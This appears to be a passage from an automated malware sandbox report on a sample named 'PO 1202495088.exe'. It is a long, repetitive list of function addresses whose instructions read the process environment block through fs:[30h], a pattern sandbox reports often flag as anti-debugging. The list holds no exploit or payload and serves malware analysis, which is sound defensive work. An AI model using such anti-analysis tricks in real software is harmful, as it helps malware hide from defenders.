                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E79D mov eax, dword ptr fs:[00000030h]4_2_0142E79D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E79D mov eax, dword ptr fs:[00000030h]4_2_0142E79D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014547B4 mov eax, dword ptr fs:[00000030h]4_2_014547B4
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014547B4 mov eax, dword ptr fs:[00000030h]4_2_014547B4
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014547B4 mov eax, dword ptr fs:[00000030h]4_2_014547B4
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014547B4 mov eax, dword ptr fs:[00000030h]4_2_014547B4
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014547B4 mov eax, dword ptr fs:[00000030h]4_2_014547B4
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014547B4 mov eax, dword ptr fs:[00000030h]4_2_014547B4
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014547B4 mov ecx, dword ptr fs:[00000030h]4_2_014547B4
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0144C7B0 mov eax, dword ptr fs:[00000030h]4_2_0144C7B0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0144C7B0 mov eax, dword ptr fs:[00000030h]4_2_0144C7B0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B0630 mov eax, dword ptr fs:[00000030h]4_2_013B0630
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E0630 mov eax, dword ptr fs:[00000030h]4_2_013E0630
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EC620 mov eax, dword ptr fs:[00000030h]4_2_013EC620
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143E660 mov eax, dword ptr fs:[00000030h]4_2_0143E660
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01484600 mov eax, dword ptr fs:[00000030h]4_2_01484600
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B0670 mov eax, dword ptr fs:[00000030h]4_2_013B0670
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2670 mov eax, dword ptr fs:[00000030h]4_2_013F2670
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2670 mov eax, dword ptr fs:[00000030h]4_2_013F2670
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E666D mov esi, dword ptr fs:[00000030h]4_2_013E666D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E666D mov eax, dword ptr fs:[00000030h]4_2_013E666D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E666D mov eax, dword ptr fs:[00000030h]4_2_013E666D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E265C mov eax, dword ptr fs:[00000030h]4_2_013E265C
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E265C mov ecx, dword ptr fs:[00000030h]4_2_013E265C
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E265C mov eax, dword ptr fs:[00000030h]4_2_013E265C
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01438633 mov esi, dword ptr fs:[00000030h]4_2_01438633
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01438633 mov eax, dword ptr fs:[00000030h]4_2_01438633
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01438633 mov eax, dword ptr fs:[00000030h]4_2_01438633
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EC640 mov eax, dword ptr fs:[00000030h]4_2_013EC640
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EC640 mov eax, dword ptr fs:[00000030h]4_2_013EC640
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0147A6C0 mov eax, dword ptr fs:[00000030h]4_2_0147A6C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014586C2 mov eax, dword ptr fs:[00000030h]4_2_014586C2
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014646CB mov eax, dword ptr fs:[00000030h]4_2_014646CB
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014646CB mov eax, dword ptr fs:[00000030h]4_2_014646CB
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014466D0 mov eax, dword ptr fs:[00000030h]4_2_014466D0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014466D0 mov eax, dword ptr fs:[00000030h]4_2_014466D0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0145E6D0 mov eax, dword ptr fs:[00000030h]4_2_0145E6D0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B8690 mov eax, dword ptr fs:[00000030h]4_2_013B8690
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142C6F2 mov eax, dword ptr fs:[00000030h]4_2_0142C6F2
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142C6F2 mov eax, dword ptr fs:[00000030h]4_2_0142C6F2
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0680 mov eax, dword ptr fs:[00000030h]4_2_013C0680
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0680 mov eax, dword ptr fs:[00000030h]4_2_013C0680
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0680 mov eax, dword ptr fs:[00000030h]4_2_013C0680
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0680 mov eax, dword ptr fs:[00000030h]4_2_013C0680
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0680 mov eax, dword ptr fs:[00000030h]4_2_013C0680
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0680 mov eax, dword ptr fs:[00000030h]4_2_013C0680
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0680 mov eax, dword ptr fs:[00000030h]4_2_013C0680
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0680 mov eax, dword ptr fs:[00000030h]4_2_013C0680
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0680 mov eax, dword ptr fs:[00000030h]4_2_013C0680
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0680 mov eax, dword ptr fs:[00000030h]4_2_013C0680
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0680 mov eax, dword ptr fs:[00000030h]4_2_013C0680
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0680 mov eax, dword ptr fs:[00000030h]4_2_013C0680
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BC6E0 mov eax, dword ptr fs:[00000030h]4_2_013BC6E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D66E0 mov eax, dword ptr fs:[00000030h]4_2_013D66E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D66E0 mov eax, dword ptr fs:[00000030h]4_2_013D66E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014786A8 mov eax, dword ptr fs:[00000030h]4_2_014786A8
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014786A8 mov eax, dword ptr fs:[00000030h]4_2_014786A8
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B06CF mov eax, dword ptr fs:[00000030h]4_2_013B06CF
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E2919 mov eax, dword ptr fs:[00000030h]4_2_013E2919
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E2919 mov eax, dword ptr fs:[00000030h]4_2_013E2919
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B6970 mov eax, dword ptr fs:[00000030h]4_2_013B6970
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B6970 mov eax, dword ptr fs:[00000030h]4_2_013B6970
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B6970 mov eax, dword ptr fs:[00000030h]4_2_013B6970
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B6970 mov eax, dword ptr fs:[00000030h]4_2_013B6970
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B6970 mov eax, dword ptr fs:[00000030h]4_2_013B6970
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B6970 mov eax, dword ptr fs:[00000030h]4_2_013B6970
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B6970 mov eax, dword ptr fs:[00000030h]4_2_013B6970
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01406912 mov eax, dword ptr fs:[00000030h]4_2_01406912
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C096B mov eax, dword ptr fs:[00000030h]4_2_013C096B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C096B mov eax, dword ptr fs:[00000030h]4_2_013C096B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142C920 mov ecx, dword ptr fs:[00000030h]4_2_0142C920
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142C920 mov eax, dword ptr fs:[00000030h]4_2_0142C920
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142C920 mov eax, dword ptr fs:[00000030h]4_2_0142C920
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142C920 mov eax, dword ptr fs:[00000030h]4_2_0142C920
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0148492D mov eax, dword ptr fs:[00000030h]4_2_0148492D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EC958 mov eax, dword ptr fs:[00000030h]4_2_013EC958
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D4955 mov eax, dword ptr fs:[00000030h]4_2_013D4955
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D4955 mov eax, dword ptr fs:[00000030h]4_2_013D4955
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0147892E mov eax, dword ptr fs:[00000030h]4_2_0147892E
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0147892E mov eax, dword ptr fs:[00000030h]4_2_0147892E
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE94E mov eax, dword ptr fs:[00000030h]4_2_013DE94E
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0140693A mov eax, dword ptr fs:[00000030h]4_2_0140693A
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0140693A mov eax, dword ptr fs:[00000030h]4_2_0140693A
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0140693A mov eax, dword ptr fs:[00000030h]4_2_0140693A
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EC944 mov eax, dword ptr fs:[00000030h]4_2_013EC944
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014829CF mov eax, dword ptr fs:[00000030h]4_2_014829CF
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014829CF mov eax, dword ptr fs:[00000030h]4_2_014829CF
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E89B0 mov edx, dword ptr fs:[00000030h]4_2_013E89B0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BE9A0 mov eax, dword ptr fs:[00000030h]4_2_013BE9A0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BE9A0 mov eax, dword ptr fs:[00000030h]4_2_013BE9A0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BE9A0 mov eax, dword ptr fs:[00000030h]4_2_013BE9A0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BE9A0 mov eax, dword ptr fs:[00000030h]4_2_013BE9A0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BE9A0 mov eax, dword ptr fs:[00000030h]4_2_013BE9A0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BE9A0 mov eax, dword ptr fs:[00000030h]4_2_013BE9A0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BE9A0 mov eax, dword ptr fs:[00000030h]4_2_013BE9A0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BE9A0 mov eax, dword ptr fs:[00000030h]4_2_013BE9A0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BE9A0 mov eax, dword ptr fs:[00000030h]4_2_013BE9A0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EC98F mov eax, dword ptr fs:[00000030h]4_2_013EC98F
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EC98F mov eax, dword ptr fs:[00000030h]4_2_013EC98F
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EC98F mov eax, dword ptr fs:[00000030h]4_2_013EC98F
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01450980 mov eax, dword ptr fs:[00000030h]4_2_01450980
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01450980 mov eax, dword ptr fs:[00000030h]4_2_01450980
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B09F0 mov eax, dword ptr fs:[00000030h]4_2_013B09F0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E49F0 mov eax, dword ptr fs:[00000030h]4_2_013E49F0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E49F0 mov eax, dword ptr fs:[00000030h]4_2_013E49F0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014389A0 mov eax, dword ptr fs:[00000030h]4_2_014389A0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014469B0 mov eax, dword ptr fs:[00000030h]4_2_014469B0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014469B0 mov eax, dword ptr fs:[00000030h]4_2_014469B0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014469B0 mov ecx, dword ptr fs:[00000030h]4_2_014469B0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B89C0 mov eax, dword ptr fs:[00000030h]4_2_013B89C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B89C0 mov eax, dword ptr fs:[00000030h]4_2_013B89C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EC819 mov eax, dword ptr fs:[00000030h]4_2_013EC819
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EC819 mov eax, dword ptr fs:[00000030h]4_2_013EC819
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143C870 mov eax, dword ptr fs:[00000030h]4_2_0143C870
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01460835 mov eax, dword ptr fs:[00000030h]4_2_01460835
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01460835 mov eax, dword ptr fs:[00000030h]4_2_01460835
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01460835 mov eax, dword ptr fs:[00000030h]4_2_01460835
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01460835 mov eax, dword ptr fs:[00000030h]4_2_01460835
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01460835 mov eax, dword ptr fs:[00000030h]4_2_01460835
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01460835 mov eax, dword ptr fs:[00000030h]4_2_01460835
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01460835 mov eax, dword ptr fs:[00000030h]4_2_01460835
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01460835 mov eax, dword ptr fs:[00000030h]4_2_01460835
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01460835 mov eax, dword ptr fs:[00000030h]4_2_01460835
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01460835 mov eax, dword ptr fs:[00000030h]4_2_01460835
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01460835 mov eax, dword ptr fs:[00000030h]4_2_01460835
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01460835 mov eax, dword ptr fs:[00000030h]4_2_01460835
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01460835 mov eax, dword ptr fs:[00000030h]4_2_01460835
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F088E mov eax, dword ptr fs:[00000030h]4_2_013F088E
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F088E mov edx, dword ptr fs:[00000030h]4_2_013F088E
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F088E mov eax, dword ptr fs:[00000030h]4_2_013F088E
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014488FB mov eax, dword ptr fs:[00000030h]4_2_014488FB
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D6882 mov eax, dword ptr fs:[00000030h]4_2_013D6882
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D6882 mov eax, dword ptr fs:[00000030h]4_2_013D6882
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D6882 mov eax, dword ptr fs:[00000030h]4_2_013D6882
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BA8F0 mov eax, dword ptr fs:[00000030h]4_2_013BA8F0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BA8F0 mov eax, dword ptr fs:[00000030h]4_2_013BA8F0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BA8F0 mov eax, dword ptr fs:[00000030h]4_2_013BA8F0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BA8F0 mov eax, dword ptr fs:[00000030h]4_2_013BA8F0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BA8F0 mov eax, dword ptr fs:[00000030h]4_2_013BA8F0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BA8F0 mov eax, dword ptr fs:[00000030h]4_2_013BA8F0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143488F mov eax, dword ptr fs:[00000030h]4_2_0143488F
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E48F0 mov eax, dword ptr fs:[00000030h]4_2_013E48F0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01468890 mov eax, dword ptr fs:[00000030h]4_2_01468890
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01468890 mov eax, dword ptr fs:[00000030h]4_2_01468890
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013A88C8 mov eax, dword ptr fs:[00000030h]4_2_013A88C8
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013A88C8 mov eax, dword ptr fs:[00000030h]4_2_013A88C8
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B08CD mov eax, dword ptr fs:[00000030h]4_2_013B08CD
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B08CD mov eax, dword ptr fs:[00000030h]4_2_013B08CD
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C28C0 mov eax, dword ptr fs:[00000030h]4_2_013C28C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C28C0 mov eax, dword ptr fs:[00000030h]4_2_013C28C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C28C0 mov eax, dword ptr fs:[00000030h]4_2_013C28C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C28C0 mov eax, dword ptr fs:[00000030h]4_2_013C28C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C28C0 mov eax, dword ptr fs:[00000030h]4_2_013C28C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C28C0 mov eax, dword ptr fs:[00000030h]4_2_013C28C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C28C0 mov eax, dword ptr fs:[00000030h]4_2_013C28C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C28C0 mov eax, dword ptr fs:[00000030h]4_2_013C28C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C28C0 mov eax, dword ptr fs:[00000030h]4_2_013C28C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C28C0 mov eax, dword ptr fs:[00000030h]4_2_013C28C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C28C0 mov eax, dword ptr fs:[00000030h]4_2_013C28C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C28C0 mov eax, dword ptr fs:[00000030h]4_2_013C28C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C28C0 mov eax, dword ptr fs:[00000030h]4_2_013C28C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013ECB20 mov eax, dword ptr fs:[00000030h]4_2_013ECB20
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DEB1C mov eax, dword ptr fs:[00000030h]4_2_013DEB1C
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013ACB1E mov eax, dword ptr fs:[00000030h]4_2_013ACB1E
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B8B10 mov eax, dword ptr fs:[00000030h]4_2_013B8B10
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B8B10 mov eax, dword ptr fs:[00000030h]4_2_013B8B10
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B8B10 mov eax, dword ptr fs:[00000030h]4_2_013B8B10
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0B10 mov eax, dword ptr fs:[00000030h]4_2_013C0B10
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0B10 mov eax, dword ptr fs:[00000030h]4_2_013C0B10
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0B10 mov eax, dword ptr fs:[00000030h]4_2_013C0B10
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0B10 mov eax, dword ptr fs:[00000030h]4_2_013C0B10
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01484B67 mov eax, dword ptr fs:[00000030h]4_2_01484B67
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01466B77 mov eax, dword ptr fs:[00000030h]4_2_01466B77
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E4B79 mov eax, dword ptr fs:[00000030h]4_2_013E4B79
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BAB70 mov eax, dword ptr fs:[00000030h]4_2_013BAB70
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BAB70 mov eax, dword ptr fs:[00000030h]4_2_013BAB70
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BAB70 mov eax, dword ptr fs:[00000030h]4_2_013BAB70
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BAB70 mov eax, dword ptr fs:[00000030h]4_2_013BAB70
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BAB70 mov eax, dword ptr fs:[00000030h]4_2_013BAB70
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BAB70 mov eax, dword ptr fs:[00000030h]4_2_013BAB70
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B6B70 mov eax, dword ptr fs:[00000030h]4_2_013B6B70
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B6B70 mov eax, dword ptr fs:[00000030h]4_2_013B6B70
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B6B70 mov eax, dword ptr fs:[00000030h]4_2_013B6B70
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143CB20 mov eax, dword ptr fs:[00000030h]4_2_0143CB20
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143CB20 mov eax, dword ptr fs:[00000030h]4_2_0143CB20
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143CB20 mov eax, dword ptr fs:[00000030h]4_2_0143CB20
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01434BC0 mov eax, dword ptr fs:[00000030h]4_2_01434BC0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01434BC0 mov eax, dword ptr fs:[00000030h]4_2_01434BC0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01434BC0 mov eax, dword ptr fs:[00000030h]4_2_01434BC0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01434BC0 mov eax, dword ptr fs:[00000030h]4_2_01434BC0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01456BDE mov ebx, dword ptr fs:[00000030h]4_2_01456BDE
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01456BDE mov eax, dword ptr fs:[00000030h]4_2_01456BDE
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01484BE0 mov eax, dword ptr fs:[00000030h]4_2_01484BE0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D8BD1 mov eax, dword ptr fs:[00000030h]4_2_013D8BD1
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D8BD1 mov eax, dword ptr fs:[00000030h]4_2_013D8BD1
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01478BBE mov eax, dword ptr fs:[00000030h]4_2_01478BBE
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01478BBE mov eax, dword ptr fs:[00000030h]4_2_01478BBE
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01478BBE mov eax, dword ptr fs:[00000030h]4_2_01478BBE
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01478BBE mov eax, dword ptr fs:[00000030h]4_2_01478BBE
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AEBC0 mov eax, dword ptr fs:[00000030h]4_2_013AEBC0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0144AA40 mov eax, dword ptr fs:[00000030h]4_2_0144AA40
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0144AA40 mov eax, dword ptr fs:[00000030h]4_2_0144AA40
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01434A57 mov eax, dword ptr fs:[00000030h]4_2_01434A57
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01434A57 mov eax, dword ptr fs:[00000030h]4_2_01434A57
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01466A50 mov ecx, dword ptr fs:[00000030h]4_2_01466A50
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EAA0E mov eax, dword ptr fs:[00000030h]4_2_013EAA0E
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EAA0E mov eax, dword ptr fs:[00000030h]4_2_013EAA0E
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DEA40 mov eax, dword ptr fs:[00000030h]4_2_013DEA40
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DEA40 mov eax, dword ptr fs:[00000030h]4_2_013DEA40
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01454AC2 mov eax, dword ptr fs:[00000030h]4_2_01454AC2
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01484AE8 mov eax, dword ptr fs:[00000030h]4_2_01484AE8
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01450AE0 mov eax, dword ptr fs:[00000030h]4_2_01450AE0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01452AE0 mov eax, dword ptr fs:[00000030h]4_2_01452AE0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01452AE0 mov eax, dword ptr fs:[00000030h]4_2_01452AE0
